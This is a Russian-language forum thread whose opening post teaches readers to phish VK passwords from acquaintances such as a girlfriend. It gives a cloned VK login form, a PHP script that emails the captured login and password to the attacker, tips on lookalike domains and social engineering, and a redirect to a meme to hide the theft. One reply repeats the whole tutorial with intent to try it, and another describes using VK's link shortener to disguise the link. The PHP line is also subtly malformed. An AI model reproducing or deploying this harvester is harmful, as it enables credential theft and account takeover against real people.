Фишинг для самых маленьких

Status
Not open for further replies.

Gidroponika

Exploit Developer
Joined
Aug 17, 2016
Messages
1,788
Reaction score
826
Всем здарова, ребятишки. Сегодня мы будем воровать пароль от вк у вашей подружки. Для этого нам понадобится любой текстовый редактор на ваш вкус, хостинг с поддержкой php, и ftp клиент чтоб залить все ваше творчество на хостинг.
Сначала открываем страницу входа в вк, не ту что появляется первой ссылкой, а вот такую: https://vk.com/login?&to=&s=0&m=1&email=
Тыкаем правой кнопкой и скачиваем себе на комп. Далее открываем скачаный html файл в текстовом редакторе и находим вот такие строки:


HTML:
<form method="POST" name="login" id="quick_login_form" action="https://login.vk.com/?act=login">
    <input type="hidden" name="act" value="login" />
    <input type="hidden" name="role" value="al_frame" />
    <input type="hidden" name="expire" id="quick_expire_input" value="" />
    <input type="hidden" name="captcha_sid" id="quick_captcha_sid" value="" />
    <input type="hidden" name="captcha_key" id="quick_captcha_key" value="" />
    <input type="hidden" name="_origin" value="https://vk.com" />
    <input type="hidden" name="ip_h" value="08695bb0515f567d1a" />
    <input type="hidden" name="lg_h" value="fe00f4b8112e1f6b68" />
    <div class="label">Телефон или e-mail</div>
    <div class="labeled"><input type="text" name="email" class="dark" id="quick_email" /></div>
    <div class="label">Пароль</div>
    <div class="labeled"><input type="password" name="pass" class="dark" id="quick_pass" onkeyup="toggle('quick_expire', !!this.value);toggle('quick_forgot', !this.value)" /></div>
    <input type="submit" class="submit" />
  </form>
Пока их не трогаем, создаем в папке с этим файлом тек

Пока их не трогаем, создаем в папке с этим файлом текстовый файл с расширением php, открываем его и вставляем туда этот скрипт



PHP:
<?php

    $result = mail("Mail@mail.com" ,"Лови, братиш" " \nЛогин: $_POST[email] \nПароль: $_POST[pass] ");
    if ($result) {
        echo "<html><head><META HTTP-EQUIV='Refresh' content ='0; URL= /'></head></html>";
    }
    else {
        echo "<p>Eror. This shit is dont work</p>";
    }
?>


Там где должен быть емейл прописываем свой, далее открываем любой мемчик в вк и после URL= вставляем ссылку на него. Далее узнаете зачем это нужно. Сохраняем этот файл. Возвращаемся к html файлу и в самом верху видим "action=" вместо той ссылки указываем путь к нашему php файлу, если они в одной папке, то просто прописываем имя файла вместе с расшерением. Сохраняем.

Заливаем эти два файла на хостинг вместе с папкой со стилями и js скриптами которая скачалась вместе с html файлом. Даем имя домену что-то типа "vck" или "memes228" чтоб в адресной строке не сильно палилось.

И у нас все готово. Но что собственно мы вообще сделали? При переходе по вашей ссылке у жертвы откроется окно авторизации, она подумает, что все нормально, бывает. Введет свой логин и пароль, дальше жертву перенаправит на тот самый мемчик который вы ей скинули.

А данные отправляться к вам на почту которую вы указали в php файле, среди сотен сообщений от warface и танков вы найдете сообщение с паролем. Все, красавцы, кулхацкеры, мистеры роботы. Но только такой способ очень уж древний и про него любой нормальный человек знает и скорее всего вас пошлют туда откуда вы вылезли при рождении, да ещё и наваляют в школе. Но на всяких тпшках и быдлоте с вашего подьезда, которые отбирают у Вас мелочь, проканает. Да и администрация быстро пропаливает такие ссылки, за дня 3 уже заблокируют, поэтому кидайте жертве когда она гарантировано перейдет по ней. Ну и самое главное правильно навешать лапши на уши ибо все провалиться даже не начавшись. Для надежности можно потренироваться на друзьях. Вот и все)
 

Areot

Reverse Engineer
Joined
Jun 11, 2017
Messages
1,908
Reaction score
291
Age
32
Отличный фишинг :)
 

BonviP

Member
Joined
Jun 25, 2017
Messages
24
Reaction score
1
Всем здарова, ребятишки. Сегодня мы будем воровать пароль от вк у вашей подружки. Для этого нам понадобится любой текстовый редактор на ваш вкус, хостинг с поддержкой php, и ftp клиент чтоб залить все ваше творчество на хостинг.
Сначала открываем страницу входа в вк, не ту что появляется первой ссылкой, а вот такую: https://vk.com/login?&to=&s=0&m=1&email=
Тыкаем правой кнопкой и скачиваем себе на комп. Далее открываем скачаный html файл в текстовом редакторе и находим вот такие строки:


HTML:
<form method="POST" name="login" id="quick_login_form" action="https://login.vk.com/?act=login">
    <input type="hidden" name="act" value="login" />
    <input type="hidden" name="role" value="al_frame" />
    <input type="hidden" name="expire" id="quick_expire_input" value="" />
    <input type="hidden" name="captcha_sid" id="quick_captcha_sid" value="" />
    <input type="hidden" name="captcha_key" id="quick_captcha_key" value="" />
    <input type="hidden" name="_origin" value="https://vk.com" />
    <input type="hidden" name="ip_h" value="08695bb0515f567d1a" />
    <input type="hidden" name="lg_h" value="fe00f4b8112e1f6b68" />
    <div class="label">Телефон или e-mail</div>
    <div class="labeled"><input type="text" name="email" class="dark" id="quick_email" /></div>
    <div class="label">Пароль</div>
    <div class="labeled"><input type="password" name="pass" class="dark" id="quick_pass" onkeyup="toggle('quick_expire', !!this.value);toggle('quick_forgot', !this.value)" /></div>
    <input type="submit" class="submit" />
  </form>
Пока их не трогаем, создаем в папке с этим файлом тек

Пока их не трогаем, создаем в папке с этим файлом текстовый файл с расширением php, открываем его и вставляем туда этот скрипт



PHP:
<?php

    $result = mail("Mail@mail.com" ,"Лови, братиш" " \nЛогин: $_POST[email] \nПароль: $_POST[pass] ");
    if ($result) {
        echo "<html><head><META HTTP-EQUIV='Refresh' content ='0; URL= /'></head></html>";
    }
    else {
        echo "<p>Eror. This shit is dont work</p>";
    }
?>


Там где должен быть емейл прописываем свой, далее открываем любой мемчик в вк и после URL= вставляем ссылку на него. Далее узнаете зачем это нужно. Сохраняем этот файл. Возвращаемся к html файлу и в самом верху видим "action=" вместо той ссылки указываем путь к нашему php файлу, если они в одной папке, то просто прописываем имя файла вместе с расшерением. Сохраняем.

Заливаем эти два файла на хостинг вместе с папкой со стилями и js скриптами которая скачалась вместе с html файлом. Даем имя домену что-то типа "vck" или "memes228" чтоб в адресной строке не сильно палилось.

И у нас все готово. Но что собственно мы вообще сделали? При переходе по вашей ссылке у жертвы откроется окно авторизации, она подумает, что все нормально, бывает. Введет свой логин и пароль, дальше жертву перенаправит на тот самый мемчик который вы ей скинули.

А данные отправляться к вам на почту которую вы указали в php файле, среди сотен сообщений от warface и танков вы найдете сообщение с паролем. Все, красавцы, кулхацкеры, мистеры роботы. Но только такой способ очень уж древний и про него любой нормальный человек знает и скорее всего вас пошлют туда откуда вы вылезли при рождении, да ещё и наваляют в школе. Но на всяких тпшках и быдлоте с вашего подьезда, которые отбирают у Вас мелочь, проканает. Да и администрация быстро пропаливает такие ссылки, за дня 3 уже заблокируют, поэтому кидайте жертве когда она гарантировано перейдет по ней. Ну и самое главное правильно навешать лапши на уши ибо все провалиться даже не начавшись. Для надежности можно потренироваться на друзьях. Вот и все)
нАДО ПОПРОБОВАТЬ)
 

demasssu

Member
Joined
Aug 15, 2017
Messages
33
Reaction score
0
Age
26
сенкс автору за подобное. лови лайлайклайк
 

shamoon

Погромист
Joined
Jun 8, 2017
Messages
42
Reaction score
3
годно)
зарегал домен в ру зоне за сотку, и через сокращатор vk-шный норм скармливается, почти не заметно после перехода подвоха
View attachment 5251
 

AlexMall

Member
Joined
Dec 26, 2017
Messages
12
Reaction score
0
Age
27
Уже есть сайты с готовыми фейк-ссылками. Создавать свои нет смысла
 

FuckMyLife

Exploit Developer
Joined
Jul 15, 2016
Messages
310
Reaction score
197
Age
27
У меня такие ссылки за пол дня банили))
 

morpexbro

New member
Joined
Jan 10, 2018
Messages
3
Reaction score
0
Age
25
а что делать если код html вк? где-то часть кода в html есть, а в примере нету. что с ними делать? изменять?
 
Status
Not open for further replies.
Top